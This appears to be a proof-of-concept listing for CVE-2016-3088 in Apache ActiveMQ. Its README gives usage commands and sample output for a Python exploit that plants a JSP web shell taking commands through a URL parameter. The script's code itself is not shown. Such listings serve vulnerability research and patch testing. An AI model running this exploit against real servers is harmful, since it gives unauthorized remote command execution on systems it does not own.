CVE-2016-3088 PoC — Apache ActiveMQ 输入验证错误漏洞

Source

Associated Vulnerability

Description

A Python-based Exploit Script for CVE-2016-3088

Readme

# CVE-2016-3088
## Statement
A Python-based Exploit Script for CVE-2016-3088.\
This is my first script, so there may be something doesn't quite fit.\
But it seems go right when I tested.
## Discription
This script can eliminate the need to capture packets during the penetration of CVE-2016-3088,\
so we can write & move the file directly.
## Usage
```
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
```

the parameter --script is optional, it will use the build-in payload if you run program without it,\
the payload is only lets you execute a few commands in the url.\
But you can enter other scripts to achieve your purpose.
## Installation
Just download the .py .\
And it requires some modules.
## Example
```
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq

[+] The target is Vulnerable  
[+] Exploiting...  
[+] Successful!  
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]  
```

##### Use the --script  
```
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt

[+] The target is Vulnerable  
[+] Exploiting...  
[+] Successful!  
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp  
```

## Disclaimer
Pls use this tool with care and only when authorized!

File Snapshot

 [4.0K]  /data/pocs/18f8ff70920cb3be89d341bc378c354e0cb3c77a
├── [4.0K]  CVE-2016-3088.py
└── [1.4K]  README.md

0 directories, 2 files

Remarks